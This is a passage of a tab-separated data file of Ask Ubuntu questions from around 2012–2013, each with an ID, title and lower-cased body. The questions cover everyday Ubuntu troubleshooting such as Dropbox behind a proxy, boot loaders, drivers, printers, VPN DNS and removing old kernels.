244563	dropbox installation failed ( behind proxy )	i 'm new to ubuntu ( 12.10 ) , maybe i 'm doing something stupid , but i ca n't get dropbox work . 1st try : i tried to install it via the softwarecenter , the result is the dropbox symbol in the launch bar . klicking on it is effectiveless , it only asks for the password and then stops doing anything . 2nd try : in the terminal with cd ~ & & wget -o - `` https : //www.dropbox.com/download ? plat=lnx.x86_64 '' | tar xzf - which results in -- 2013-01-17 17:53:28 -- https : //www.dropbox.com/download ? plat=lnx.x86_64 resolving proxy.hs-karlsruhe.de ( proxy.hs-karlsruhe.de ) ... 193.196.64.2 connecting to proxy.hs-karlsruhe.de ( proxy.hs-karlsruhe.de ) |193.196.64.2|:8888 ... connected . proxy tunneling failed : proxy authentication requiredunable to establish ssl connection . gzip : stdin : unexpected end of file tar : child returned status 1 tar : error is not recoverable : exiting now 3rd try : from the question here i tried the suggested solution : https_proxy=http : //proxy.hs-karlsruhe.de:8888 dropbox start -i which results in starting dropbox ... dropbox is the easiest way to share and store your files online . want to learn more ? head to http : //www.dropbox.com/ enter username for squid proxy-caching web server at proxy.hs-karlsruhe.de:8888 : user enter password for user in squid proxy-caching web server at proxy.hs-karlsruhe.de:8888 : passwd downloading dropbox ... 100 % traceback ( most recent call last ) : file `` /usr/bin/dropbox '' , line 1404 , in < module > ret = main ( sys.argv ) file `` /usr/bin/dropbox '' , line 1393 , in main result = commands [ argv [ i ] ] ( argv [ i+1 : ] ) file `` /usr/bin/dropbox '' , line 817 , in update download ( ) file `` /usr/bin/dropbox '' , line 556 , in download name , i , total = one_member.next ( ) file `` /usr/bin/dropbox '' , line 278 , in unpack if not verify_signature ( stringio.stringio ( dropbox_public_key ) , signature , self.local_file ) : file `` /usr/bin/dropbox '' , line 201 , in verify_signature sigs = ctx.verify ( sig_file , plain_file , none ) gpgme.gpgmeerror : ( 7 , 58 , u'no data ' ) the installation of dropbox failed . i do n't know what else i can try : ( does anyone know what i can do ? thanks in advance !
244565	how to bypass windows vista from power up on dual boot system	i 've been using the dual boot system with ubuntu 12.04 lts and windows vista . i no longer want to use windows but wish to keep all files . how do i make ubuntu be the sole os without wiping out everything i 've done .
244567	remove sudo password when connecting to *new* wifi network	so currently when my non-admin user tries to connect to a new wifi network ( e.g . at a cafe say ) networkmanager prompts for the admin user 's password . is there a way to turn this off and to allow the non-admin user to connect to whatever wifi network they like ? edit : just to clarify , i really mean a new wifi network never connected to prior by the computer , so clicking 'available to all users ' on an existing established connection will not solve the matter- as currently no issue with the non-admin user reconnecting as many times as they like to the home network .
244573	can anybody recommend a wireless pci card working out-of-the-box in ubuntu 12.10 ( 64bit ) ?	i have recently bought new desktop . everything works flawlessly in ubuntu 12.10 64bit , except my ( kinda outdated ) wireless pci card realtek 8185 . so i am about to buy new one . please can you recommend a pci card ( or at least chipset ) , that is known to work in new ubuntu without glitches ( no need to wrap windows , drivers etc ... ) . the information i have found on the web seems to be far too inconsistent , so i would like to hear some experiences .
244577	temperature and other statistics from radeon open source drivers ?	how can i see gpu % usage , temperature , fan speed , etc , with radeon open source drivers ?
244578	closing laptop lid does not shut all applications down	well i was just thinking of having an app or a feature which enables you to play music even the laptop lid is shut close . what i want is that the screen should be locked ie no one should be able to do any other thing and at the same time my music should be contiued to play ; virtually turning my lid-turned down laptop into a musical jukebox , ie a musical screen saver of sorts . can anyone help me in achieving this ? any hints ?
244579	will it be possible to run android apps on ubuntu phone ?	i know that the basic question of running android apps on ubuntu has already been answered , but mostly for ubuntu desktop . what i was wondering is , if there will be a way to download and run android apps on ubuntu phone . would be great because it would solve the problem of not having many apps available in the beginning ...
244580	accessing apache remotely	i have two machines a and b. i have connected both machines using utp cabel . i have assigned an ip address to machine a ( 192.168.0.1 ) and machine b ( 192.168.0.2 ) . machine a contains ubuntu server 11.10 with xampp server . i have created a php project that runs on machine a on xampp . now i need to access this project on machine b. i have seen alot of posts but they are talking about routers and etc etc . nothing giving me any clear idea . .
244582	add certificate authorities system-wide on firefox	i want to add some root cas that does n't come with the default firefox on ubuntu , but i do n't know how . i tried adding them to the local certificates with certutil , but it did n't work . it messed up my certificates database . $ certutil -a -d .mozilla/firefox/kek3dogy.default/ -i /usr/local/share/ca-certificates/fnmt_acraiz.crt -n `` certificado raiz fnmt '' -t `` tcu , cuw , tuw '' and then $ certutil -l -d .mozilla/firefox/kek3dogy.default/ certificate nickname trust attributes ssl , s/mime , jar/xpi go daddy secure certification authority , , verisign class 3 secure server ca - g3 , , verisign class 3 extended validation ssl ca , , digicert high assurance ca-3 , , globalsign domain validation ca - g2 , , geotrust ssl ca , , startcom class 2 primary intermediate server ca , , google internet authority , , certificado raiz fnmt ct , c , c usertrust legacy secure server ca , , hp jetdirect 2b0ead20 , , akamai subordinate ca 3 , , verisign , inc. , , thawte sgc ca , , verisign class 3 secure server ca - g2 , , the certificate wo n't show up on firefox . i tried this several times , even deleting the profile , and it showed up once on the firefox interface , but completely empty . anyways , that 's only for a user , and i want to add them system-wide . is there a system-wide database i can modify ? how ? if there is no system-wide database i can modify , i can rely on a x start script ( as /etc/x11/xsession.d/ ones , or a script called by the xdg autostart system on /etc/xdg/autostart/ ) to modify the user profile at session start , but i need a solution that works . i ca n't even load certificates on the user profiles from the command line now !
244588	update - what is the quickest way to get to system update ?	i am obviously new to ubuntu . i keep digging all over to get to update . i ususally seem to get it running . i am on limited bandwidth and do n't want to waste time . can i put this directly in the side bar some how ?
244591	add cron job on startup from a script	i would like to add a command to be run at startup from within a shell script . for example , i run the script once and it adds the cron job , so from that time on , each time the os starts , a specific program is started . more specific , i 'd need xbindkeys to run on startup and this to be done by a one-time running script . so far i think this line would do the work : @ reboot xbindkeys ( xbindkeys is in path ) how could i add this job from a script ?
244596	why does installing a 12.10 virtual machine want to overwrite my 12.04 host installation ?	i have installed ubuntu 12.04.1 lts , i then installed virtual box . and windows xp in as a virtual machine . i also installed the additional guest add ons , and other extensions , which allows my virtual machine to use shared folders and usb devices . i then downloaded ubuntu 12.10 . i installed it on the virtual box , but on the installation process , ubuntu 12.10 says that it has detected my ubuntu 12.04.1 lts and give me the option of erasing my 12.04.1 lts and replacing it with the 12.10 ? my question is : is virtual box serious ? what would happen if i choose that option saying `` replace 12.04.1 with 12.10 '' .. its just a virtual machine right ?
244603	how to keep pidgin-libnotify not blacklisted from messaging menu ?	i 've been successfully using pidgin since it was rebranded from gaim and it has been integrated into messaging menu in ubuntu . but now in 12.04 after uninstalling empathy and installing pidgin , after successfully integration in messaing menu , pidgin-libnotify is forced to be blacklisted and stops showin in menu . how ? after booting system i click on pidgin in messaging menu . it launches , but after a while pidgin dissapears from messaging menu and in ~/.config/indicators/messages/applications-blacklist/ a file pidgin-libnotify appears . i 've purged and installed again pidgin and it still works as described above ...
244607	resolve orphan home after reinstall	original ubuntu 11.10 install contained / , /home . swap . uncorrectable problems required a reinstall/upgrade to 12.04 . only / was formated for the reinstall . all works , except that i have empty home on the root partition . can i rename this home to '' oldhome '' ? then i will mount untouched /home on separate partition where all my data files are located ? is this the best way to resolve this issue ?
244611	blocking non-admin user from using dvd drive	how can i stop a non-admin user from using the dvd drive ( specifically burning dvds if possible , but all access denied is fine too ) . i 've tried removing them from cdrom group but this did not seem to change anything . my dvd drive appears to be /dev/sr0 and doing right-click > properties > permissions seems to show owner : root access : read and write , group : cdrom , access : read and write also groups < mynonadminuser > shows he is not a member of cdrom so how can he access the dvd drive ? could it be something to do with my fstab file ?
244613	my bluetooth headset is sizzle and no sound , i use 12.10	i use blueman and bluez , sometimes no sound , sometimes the headset is sizzle ... can anybody help me ?
244615	how can i concatenate several flv files into one ?	i have a handful of flv files that are in fact a single sequence . i 'd like to combine them into a single file , e.g . part1.flv , part2.flv , part3.flv become final.flv . what is the easiest way that i can do this without losing video quality ?
244618	why lxpanel 0.5.11 asks for a new dependency in precise but not in quantal ?	lxpanel 0.5.11 that is default in lubuntu quantal has enhanced features compared to the older version that is default in lubuntu precise ( 0.5.8 ) . the new version of lxpanel is available for precise . but while installing that in precise 12.04 , it asks for libmenu-cache2 ( that seems available only for raring 13.04 ) . installing that libmenu-cache2 in precise would allow installing lxpanel 0.5.11 ( for precise ) . ( but is it safe to install this libmenu-cache2 for raring in 12.04 ? should it replace libmenu-cache1 there ? it does not by default . ) the odd thing is that in a different computer with lubuntu quantal i see that lxpanel 0.5.11 works with only libmenu-cache1 .
244621	ubuntu dual boot breaks keyboard in windows 7	i have a hp probook 4530s notebook pc . main os is windows 7 pro . i tried to install ubuntu ( from windows with dual boot ) several times and the result is the same . ubuntu works fine but there is a strange issue with keyboard back in windows . some keys wont produce any output , some with a delay . have anyone experienced such issues ?
244622	touchscreen and digitizer not working on sony vaio duo 11	i have a sony vaio duo 11 ( svd112 ... ) which features both multi-touch and stylus input . however , booting up ubuntu 12.10 gives me no stylus reaction touch input works very strange : when i touch with 1-3 fingers , usually nothing happens but sometimes there is some reaction when i tap the screen with 4 fingers , the dash shows up , consistently where can i start to find out the underlying issue and how to fix it ? edit : on ubuntu 12.04.1 the touchscreen is n't recognized at all . edit2 : on fedora 18 , the touchscreen works a little bit better . i have found out that the usb id of the touchscreen is not contained in the hid-ntrig module , so that 's probably why some of the quirks needed for it are not appplied .
244625	ubuntu12.10 boot up problem screen flickering	i recently installed ubuntu 12.10 64 bit version on my toshiba satellite with amd radeon dual grahpics alongside windows 8 and whenever it boots up it first stops at the purple screen for about 20 seconds then starts to madly flicker between bits of writing and the ubuntu boot logo and after a long time it finally stops and then ubuntu boots up . i do n't know what is happening but i gave the same disk that i used to my friend and his one works fine . my video graphics are fully updated as well .
244628	how to create link to linux server	in these days i 'm setting up a small network with about twenty computers . the users of this network used windows before and they need to access samba ubuntu folders simply using their name ( which is same as their login ) and password ( there 's no problem for them with typing access data ) . in that case i need the simplest way for them to access it . i was thinking of using links ( i found out it 's impossible ) and bookmarks are working well , but i need the solution to be cloneable ( i 'm cloning user accounts to another computers in the network - /etc/passwd and home directories ) . is there any way how to do it simply ? edit : if the things upper are not simply possible , please tell me at least some way how to connect to a single server called `` server-desktop '' .
244632	super button wo n't open the dash in an empty workspace	i was using ubuntu 12.04 with gnome3 for a while , than started back on unity . my problem is that the super button only opens the dash when there are already a few windows in a workspace . when the workspace is empty ( there are no windows on that workspace ) , the only way to open the dash is clicking on the ubuntu icon in the launcher . is this the expected behavior or do i have some problem ? solution the problem was caused because i had turned off the desktop handling by nautilus . so , it seems that this shortcut only runs when there 's at least the nautilus desktop or something else running on that workspace . it looks like a buggy feature to me . i 'll post a bug issue later on when i confirm how to reproduce it , and see what people from the dev team say about it .
244640	logging in the new created user ubuntu12.04 lts	i just created an account with name rashmi and set its password . then i restarted my system . when i log in to rashmi another screen appears for less than a second and then vanish and again the login screen comes back . so i am not able to login in to ubuntu from the newly created user i created my user with sudo useradd rashmi , then set its password using sudo passwd rashmi . can anyone please tell me how to log in as a new user and where i am going wrong ?
244641	how to set up and use a virtual python environment in ubuntu ?	python virtual environments are used to create isolated python environments to avoid dependency and version conflicts , and also indirectly takes care of permission issues . but what is the easiest way to set it up , and use it , in ubuntu ?
244646	handling a very large number of network interface aliases	i have what is probably a bit of an unusual problem . i 'm developing a network stress testing tool for internal use , and one of the things i need is to simulate a lot of entities each with their own ip address . to achieve this , i 've turned to interface aliases . a typical config looks like this : auto eth1:1 iface eth1:1 inet static address 1.1.10.1 netmask 255.255.0.0 broadcast 1.1.255.255 the problem is that at the moment i have 10,000 of these . linux seems to cope well ( surprised me i must admit ) , but i had some problems setting them up . the first problem was that the scripts in if-up.d/ seem to be run for every interface . among the scripts we find ntdate and openssh-server . trying to create 10,000 instances of those caused some problems . i hacked both scripts like this : if [ [ `` $ iface '' == * '' : '' * ] ] ; then exit 0 fi so the script now returns immediately if the interface is an alias . but i still have problems . the aliased interfaces are not automatically created on boot it seems , so to start them i run ifup -a -i my_interface_file this works , but it takes about 3 minutes to run . now , one reason that it takes a long time to run is presumably that it needs to create one shell interpreter per interface per script , which translates into 40,000 of them in my case . so , i guess my question is twofold : is there some smarter way i can solve my actual problem which is having 10,000 entities with their own ip address ( localhost is not an option , they do interact with stuff on the outside ) if not , are there ways to configure this that are better than the way i do it now ? specifically , a way to avoid hacking the if-up.d scripts , and preferably something a little faster . and it should automatically start up at boot .
244648	is it safe to install libmenu-cache2 in lubuntu 12.10 and 12.04 ?	newer versions of lxpanel ask for libmenu-cache2 ( see this answer ) . i can not tell exactly which version started asking for it , but i think it is 0.5.11 ( see this ) . i was able to find libmenu-cache2 here , but it looks it was made for raring . can not find it for quantal . installation of libmenu-cache2 in quantal or precise seems to work ok . it does not remove libmenu-cache1 . but is it safe ?
244654	remove ubuntu-gnome-desktop ?	i 've recently installed ubuntu-gnome-desktop on my ubuntu 12.10 32 bit system . it all worked , but now i would like to remove it again , since i like unity better . this includes undoing all changes like getting grub back to a purple background and having the original unity login screen . thanks !
244659	we need a printer for ubuntu 12.10 . how do i know it will be recognized by ubuntu ?	i am having numerous problems with linux os and ubuntu recognizing printers . i am in the process of purchasing a new printer and would appreciate any guidance on compatibility . what printer will be recognized by ubuntu ?
244660	sony vaio vpccw - brightness changes automatically when using browser	screen brightness changes automatically when i am using my browser . there is question about this matter but it is closed for being too specific . i think this is a general issue about sony vaio laptops with nvidia graphics . i had this problem when i used 10.04 and it still exists on 12.04 . since this is too annoying i just duplicate that question by picheto : '' i 'm using google chrome version 21.0.1180.89 on ubuntu 12.04 and my laptop is a sony vaio vpccw15fl ( spec sheet ) . my video driver is the propietary `` nvidia accelerated graphics driver ( post-release updates ) ( version-current updates ) '' . after installing ubuntu , i discovered that neither the brightness control buttons ( hardware ) or the brightness slider ( software ) worked , and found out i could get the hardware buttons to work by installing the nvidiabl.deb package and obacklight script . i 'm using nvidiabl-dkms 0.77 and obacklight 0.3.8 . still , the slider on the ubuntu `` settings '' does not work , but i do n't care . there is an annoying thing happening when loading certain pages in google chrome : the brightness goes up to 100 % when loading the webpage or when leaving it ( closing the tab or typing a different url on the omnibox ) . however , the `` brightness tooltip '' ( that default brightness notification ) remembers the position it was set to , so if i adjust the brightness with the hw buttons , the level gets adjusted relative to the value it was set to before `` going 100 % '' . i disabled the flash ppapi plugin , but left the npapi plugin enabled , and the problem went away for pages with flash content . still , the same thing happens when viewing html5 video , or when loading , for example , the chrome web store or using the scratchpad extension . i suppose it has to do with the rendering of certain elements using the gpu , but this is just a guess . this brightness thing does not happen when using firefox 15.0 or any other application i have used yet . does anybody know why this may be happening and what could i do to fix this without changing browser ? thanks a lot . ''
244661	libreoffice always shows recovery process at startup due to failing recovery items	libreoffice always starts with the recovery process for me now . it has a number of 'documents to recover ' for which recovery fails . i have no need for these documents anymore . how to tell libreoffice to give up ?
244668	trying to use free space on bootable usb	i 've got a 32gb usb with 790mb used for the ubuntu boot so about 31gb free space . how can i format this free space to fat/ntfs so i can use it for other things ? thanks !
244672	how can i easily create a gui dialog with a bash script ?	i need to present some text along with the items ( about 15 values ) for each of two bash list ( file ) records . on the same screen i need to present a three way selection , ( buttons , scrolled selection window , etc. ) . i 'm an ubuntu ( 11.04 ) scripting noob just beginning to use zenity in scripts . my friends suggested yad . can i do all of that in yad or use some other easy gui tool unknown to us ? .
244674	how do i change hyperlink colours in libreoffice impress ?	i have a lot of powerpoint slides that i converted to libreoffice impress . the resulting hyperlinks are very faded , very hard to see . i ca n't seem to find any way to change the colour of hyperlinks as a whole . any colour change i do make on an individual url link does not hold when converted back to .ppt which is sometimes necessary . i have tried the tools=options=libreoffice=appearance route but it only seems to affect the very first hyperlink in the slide set
244675	new files on host not showing on ubuntu ( vmware ) ?	i have a host machine ( win7 64bit ) running a vm with ubuntu 12.04 64bit . i have set up the shared folder fine ( although that was a headache in itself ) and everything is working great . i use the ubuntu machine as a php development server . if i edit the files on the host , they are changed on the guest and i can view the changes in a web browser connected to the guest . however , when i have been working on a site for a while , and i try to create a new empty file on the host the new file does not appear on the guest , and php includes for the file result in an error . i can then go into the guest and create a file with the exact same name successfully , despite it already existing on the host machine , and editing the file on the host does result in the changes being carried across . file creation does not always fail to carry across to the guest , but it is annoying when it does . any ideas why this would occur ? tl ; dr : files created on host machine are not propagating to guest machine through shared folders .
244678	how to make ubuntu let me manage the virus security ?	ubuntu 12.04 . ( sorry if this is a duplicate ) on my previous version of windows ( i 've deleted that ) i was able to manage my security , like scan , delete viruses and many more . can i have access to the virus security in ubuntu or at least have an icon in the tray to see what it 's doing ? thanks .
244680	ext4 partition ubuntu lost after windows 7 installation	i 've got this problem : i have one hdd and use ubuntu 12.10 on this hdd with several partitions ( one nfts , two ext4 and one unallocated ) . today after windows 7 installation , and booting with live usb , i see that the ubuntu partition is gone . no ubuntu boot . testdisk says : p hpfs - ntfs 12 223 20 6361 253 36 101998592 p hpfs - ntfs 15887 1 4 87965 254 59 1157949065 [ xyz ] l linux 87966 1 1 91200 254 59 51970208 so any idea how to recover the partition or the data from it ?
244682	which line of apple mac hardware is traditionally the most compatible with ubuntu/linux ?	i need a new mac for some specific osx requirements that i need 1 % of the time but for the rest of the time i need ubuntu , i usually i stick to the lts releases . i am open to the mac mini , macbook air , macbook retina , imac , whichever is most likely to give me the least amount of frustration in terms of hardware compatibility . i 'm not concerned about cost or any other factor . i want to run ubuntu on bare metal , not within a vm . any advice ?
244683	ubuntu 12.04 nvidia card overscan on hdmi hdtv	i have a gt 430 nvidia , was working fine till i upgraded to 12.04 yesterday . apparently , nvidia decided to remove the overscan slider . i ca n't adjust to fix the overscan then , except in the xorg.conf which i ca n't edit . even if i can , i 'm not sure it would fix the problem . i know the resolution that fits my tv as i have this issue in windows and in ubuntu , its 1824x1026 . strange resolution , but it works . is there a way i can either edit xorg.conf or if i can change it without doing so ? am running the latest drivers ( not the experimental ones ) . the issue with the xorg.conf is that it wo n't let me edit due to permission .
244684	connecting to a canon mg8120 printer in ubuntu 12.04.1 lts 64-bit	i have a canon mg8120 network printer and i 'm trying to use it with ubuntu 12.04.1 lts 64-bit . here 's my problem : canon admits it does not make drivers for this printer for any version of linux . so , how can i have ubuntu `` autoscan '' for printers wirelessly like i can in my mac and `` find '' it ? unfortunately , i can not connect the printer directly to the ubuntu desktop via usb . wireless is the only way it connect to pcs in the household .
244688	windows bootstrap loader lost	i recently formatted my windows and re-installed it in a separate partition . then i deleted the recovery partition . now when i rebooted my system , it did not show any grub menu . then i booted the system using a live cd and updated grub as per this . now i dont see any option of booting in windows . please help . this is the output of boot-repair .
244695	ca n't boot from live cd and ca n't find /boot/grub - next option ?	i managed to break my installation of ubuntu . the system crashed either while trying to adjust partitions or adjust the boot order ( while in windows ) - not sure which as it was a while ago ( the system is set up as dual boot , but also had an old version of ubuntu on another partition that i was trying to remove to get back the memory ) . since then i 've been unable to use the system at all as it had no screen ( previously running on an external monitor which only works after boot ) . now i 've fitted a new screen i see that i have the grub rescue > prompt . i 've tried booting from my live cd , and tried burning a new one just in case it was corrupted but i still arrive back at the grub rescue > prompt . i 've also tried following the instructions in grub2\troubleshooting with the following results : 1 ) ls gives me ( hd0 ) ( hd0,7 ) ( hd0,6 ) ( hd0,5 ) ( hd0,3 ) ( hd0,2 ) ( hd0,1 ) 2 ) ls ( hd0,7 ) / gives me error : unknown filesystem. , as do all the other filesystems . 3 ) trying other commands to see what was available i found that most give unknown command with the exceptions of insmod , set and unset . they return : grub rescue > insmod error : no module specified . grub rescue > set prefix= ( hd,8 ) /boot/grub root=hd0,8 grub rescue > unset error : no environment specified . i know there are loads of other questions on this topic on this forum and i 've read and tried the advice on many of them but i do n't know what i 'm doing wrong . they all seem to assume that step 2 above should set me on the right track .
244700	vpn not setting all dns nameservers	i have searched for a solution to my problem but i just get people who have issues who ca n't resolve any of their workplace names . my issue is i ca n't resolve one of my workplace servers . i have the vpn setup through network manager and everything seems just fine . i can connect to most of the machines and servers at work . anything that is company.local or company.localnet resolves fine . however for some reason my company has an additional nameserver company.test setup . when i am connecting to the vpn through my mac ( trying to get rid of it ) it sets up the dns fine . it uses the same nameservers as everything else . but when my ubuntu connects i can not resolve company.test and i do n't know how to add it manually or configure ubuntu to find it . i have added company.test to the vpns `` additional search domains '' but no avail . how can i manually add a single dns entry to a vpn connection or how can i configure ubuntu to pick up this company.test search domain . thanks corey
244701	how to make guest save theme changes on log-out/shut-down/restart ?	ubuntu 12.04 at the moment i 'm trying to recover my password on my only account , ( but it auto-logs in ) so i use the guest when the computer logs-out/sleeps on my administrator account . so i change the background etc. , when i use the guest session again all my changes are deleted . so how do i make these changes permanent ? thanks in advance .
244703	dual-boot windows 7 and ubuntu on two ssds with uefi	i recently built a new system with ( asus ) uefi and two ssds for boot drives , and an hdd for storage . i installed windows on the first ssd through the uefi , and it works fine , i 've been using it for a couple of weeks now . when i enter the uefi setting , however , it did not give me the option to set the second ssd as the boot device , even in advanced mode . i instead booted into the live cd ( which worked with no problems ) and installed ubuntu to the second ssd from there ( which also seemed to work with no problems ) . the problem is , now i ca n't figure out how to boot into ubuntu , only windows . the uefi still only lets me choose the windows ssd or the dvd drive to boot from , and neither grub nor the windows bootloader appears when i turn on the machine . do i need to set the device for boot loader installation to be my windows drive ? does anyone who has set up a similar system know what might be causing this ? any help is appreciated . edit : i used easybcd to add my `` /boot '' partition to the windows bootloader , and now it gives me the option to boot to ubuntu -- but when i try , it just gives me the grub rescue prompt without actually loading the kernel . edit2 : i followed the procedure in the first section of the uefi community documentation . i ran the boot-repair twice , and now i get the grub menu on booting -- but when i choose any `` ubuntu '' option , all i get is a blinking underscore . no prompt or anything , just a black screen with a white underscore . i tried entering several commands , but nothing produced any feedback .
244707	system monitor disagrees with 'free -m '	when i start up my computer , free -m says i have about 1800mb allocated and 150mb free . in system monitor , it says i have about 300mb used and 1700mb free . which one is correct ? i am having problems getting my java app to work and i keep getting out of memory exceptions even when system monitor says i have 1gb+ free . what gives ?
244710	where to install ubuntu bootloader on a mac ?	i 'm trying to install ubuntu on a mac , but i ca n't get it to boot with default mac bootloader or refi . it shows up as `` windows '' on the mac bootloader and shows up as `` linux '' on refi . i 'm not sure where should i install the bootloader to during installation . here 's my partition table : sda : hard drive manufacturer name sda0 : mac partition sda1 : ... sda4 : swap sda5 : ubuntu and i have installed the bootloader on sda5 . should i install it on sda instead ? i 'm afraid this will replace the default mac os x bootloader and i wo n't be able to go into the mac side again . any help will be greatly appreciated . thank you .
244711	duplicate source.list entry for chrome	when ever i am updating using apt-get update or via synaptic , there will be some errors . can any one help me to solve the issue ? i google about it a lot , but did n't succeed . errors are given below : w : duplicate sources.list entry http : //dl.google.com/linux/chrome/deb/ stable/main i386 packages ( /var/lib/apt/lists/dl.google.com_linux_chrome_deb_dists_stable_main_binary-i386_packages ) w : you may want to run apt-get update to correct these problems
244712	can i make ubuntu server connect to wifi and create an access point from the same wlan0 interface ?	currently i have an ubuntu 12.04 server vanilla install ( no packages installed ) on pc1 and xubuntu desktop on pc2 . both run the x64 distros . pc1 has only 1 wifi card connected ( ubdont-8 under rt2800usb driver ) which is able to connect to the internet . the network i am connecting to is a neighbours open wifi on channel 11 ( meaning no physical access there ) . what i d like to accomplish is to create an ap on pc1 on the same device so pc2 and every other wireless capable device can connect to that . i guess there is no need for channel hopping support . so far i was able to create the ap , visible from pc2 , but it ca n't connect . i guess i am doing something wrong on the bridging settings . what i have googled so far was n't really helpful as it has to do with bridging from eth0 to wlan0 .
244720	dialux alternative for linux ?	i 'm wondering if an alternative for dialux lighting simulation software exists ? it 's really important for me as i replaced autocad with draftsight i still need dialux without running it with virtualbox to fully move to ubuntu ( finally ! ) . tried wine , but it 's not working . google also does n't know any software for my needs . any electrical enineers on ubuntu that can help me out ? cheers
244724	how to find documentation about structure of system files ?	i 'm new to linux , and i 'm interested in learning the bowels of linux . i want to learn how the contents of system files are structured like , /usr/share/applications/defaults.list . i want to open .html files with sublimetext instead of chrome . so i opened defaults.list with gedit and looked for lines with `` html '' . i found things like : text/html=sublime.desktop application/xhtml_xml=google-chrome.desktop application/xhtml+xml=firefox.desktop text/xml=firefox.desktop ; google-chrome.desktop now , i could guess what it all means , but i want to read what , for example , the following means : what do the item before and after the / mean ( e.g . text/html ) ? what does `` text '' refer to , and what does `` html '' refer to ? in the previous case , it is easy to see html just refers to the extension .html , but what about in the case of `` xhtml+xml '' ? what does the `` + '' here do ? why not break it into 2 lines ? finally , what does the semi-colon mean in firefox.desktop ; google-chrome.desktop ? as i said , my question is on two levels . what do these mean in this particular case ? in general , where can i find the documentation for how system files are structured ? let 's say i also want to understand how /etc/network/interfaces works - where would i get an authoritative documentation of this file , other than random googling and reading from forums ?
244726	acer v3-571 came pre-installed with windows 8 : possible to install ubuntu ?	i recently got an acer v3-571 which came pre-installed with windows 8 . i want to install ubuntu on it . so far the solutions say to disable secure boot . however , when i go to the boot options , i am unable to change it . when the boot option is `` uefi '' , secure boot is enabled , and i can not go down to change it . when i change the boot option to `` legacy bios '' , when the computer restarts , it is unable to even detect windows 8 . is it possible to install ubuntu on this computer ?
244732	is this command to remove old kernels safe to use ?	while browsing the internet for ubuntu articles , i came across this command : sudo dpkg -l 'linux-* ' | sed '/^ii/ ! d ; / ' '' $ ( uname -r | sed `` s/\ ( . *\ ) -\ ( [ ^0-9 ] \+\ ) /\1/ '' ) '' '/d ; s/^ [ ^ ] * [ ^ ] * \ ( [ ^ ] *\ ) . */\1/ ; / [ 0-9 ] / ! d ' | xargs sudo apt-get -y purge the author said that this is a single line command which will delete all the previous versions of linux , leaving only the current one ! i 'm actually looking for such a command , but i 'm not so sure on how safe this is . i 'd like to know : whether it is safe to execute this command ? how does this command work ? i.e . explanation of small parts of such a big command if this command serves some different purpose , then what would be the correct command to achieve what the author claims it to do ? i become very confused and frustrated when i try to infer out all by myself . how does this command work for it contains numerous / , | , \ , * , and ^ characters which are hard to google for . i am looking for a step by step translation & explanation for this command which i was unable to find across the internet !
244738	block certain fonts from certain programs ?	i often vary my fonts when creating documents , and find it difficult to find the ones i often use in the drop-down menus due to the large amounts of foreign scripts , etc , that are automatically in there . i do not want to completely deactivate the other fonts ( as you can do with font manager ) , because i want system fonts active and i like having foreign fonts available when browsing the internet , etc . so , is there any way to block certain fonts from showing up in certain programs ?
244740	what can i do when ubuntu 12.10 begins to work slow ?	as stated in the title , i want to know how can i repair my existing os , ubuntu 12.10 . it seems to be very slow , earlier i installed it along side windows xp ( 32-bit ) at that time it was working fine . but now its very slow . and i 've removed windows xp . is there any way i can repair it ? or i 've to re-install it completely ? features of my pc : processor : intel core 2 duo 2.20 e4500 motherboard : asus p5kpl-am ram : 2gb gpu : nvdia geforce 9500 gt 512mb
244745	how clear/clean unneeded files or cache for my customized distro	can you help me to find out how do i clear the cache files or unnecessary or lib that can be updated on new ubuntu install i used `` ubuntu 12.10 '' this my top size file/folder list : 4380mib /usr 2784mib /usr/share 1641mib /usr/share/icons 1541mib /usr/share/icons/codex 1424mib /usr/share/icons/codex/.icon-theme.cache 1263mib /usr/lib 513mib /usr/lib/i386-linux-gnu 213mib /usr/share/fonts 208mib /usr/bin 199mib /usr/share/fonts/truetype 179mib /usr/lib/libreoffice 138mib /usr/lib/libreoffice/program 131mib /usr/share/locale 106mib /usr/lib/i386-linux-gnu/wine 100mib /usr/src 399mib /var 196mib /var/lib 188mib /var/cache 88mib /var/cache/apt-xapian-index/index.2 88mib /var/cache/apt-xapian-index 87mib /var/lib/apt 86mib /var/lib/apt/lists 80mib /var/lib/dpkg 72mib /var/lib/dpkg/info 51mib /var/cache/apt thanks alot
244747	if i use dejadup to backup to alternating destinations , will its incremental features still work ?	the use case is this : i have two usb hard drives . suppose one lives off-site , and another i keep at my desk . it 's likely that one disk will get daily backups , the other weekly or monthly . if i alternate which hard drive i 'm backing up to , is dejadup smart enough to make them both proper incremental backups ? that is to say , if i create ~/foo.txt , then backup to hard drive # 1 , and then backup to hard drive # 2 , will backup # 2 have the file , or will dejadup decide it already backed up that file and does n't need to again ? in other words , is it safe to change the backup destination in dejadup as a means of backing up to multiple places ?
244750	how do i fix dead synaptics clickpad on ubuntu 12.10 + toshiba p850 ?	i 've recently purchased a toshiba laptop having windows 8 installed . after successfully dual booting in this efi madness win8/ubuntu 12.10 i am at a loss as to how to enable the touch pad in ubuntu 12.10 . problem ( concise description ) toshiba satellite p850 ( new ) ubuntu 12.10 with gnome ( latest ) synaptics multitouch touch pad dead , no response from any stimulus . works in doz8 current work-around : i am using an usb mouse here are some helpful information regarding the computer / logs / and so forth . relevant info from various debug efforts verify type of device : egrep -i 'synap|alps|etps ' /proc/bus/input/devices n : name= '' synps/2 synaptics touchpad '' suspect driver missing , executing command to install shows this is not the case sudo apt-get install xserver-xorg-input-synaptics reading package lists ... done building dependency tree reading state information ... done xserver-xorg-input-synaptics is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 20 not upgraded . dump of xorg.0.log [ 21.804 ] ( ii ) config/udev : adding input device synps/2 synaptics touchpad ( /dev/input/event9 ) [ 21.804 ] ( ** ) synps/2 synaptics touchpad : applying inputclass `` evdev touchpad catchall '' [ 21.804 ] ( ** ) synps/2 synaptics touchpad : applying inputclass `` touchpad catchall '' [ 21.804 ] ( ** ) synps/2 synaptics touchpad : applying inputclass `` default clickpad buttons '' [ 21.804 ] ( ii ) loadmodule : `` synaptics '' [ 21.804 ] ( ii ) loading /usr/lib/xorg/modules/input/synaptics_drv.so [ 21.804 ] ( ii ) module synaptics : vendor= '' x.org foundation '' [ 21.804 ] compiled for 1.12.99.905 , module version = 1.6.2 [ 21.804 ] module class : x.org xinput driver [ 21.804 ] abi class : x.org xinput driver , version 18.0 [ 21.804 ] ( ii ) using input driver 'synaptics ' for 'synps/2 synaptics touchpad' [ 21.804 ] ( ** ) synps/2 synaptics touchpad : always reports core events [ 21.804 ] ( ** ) option `` device '' `` /dev/input/event9 '' [ 21.808 ] ( 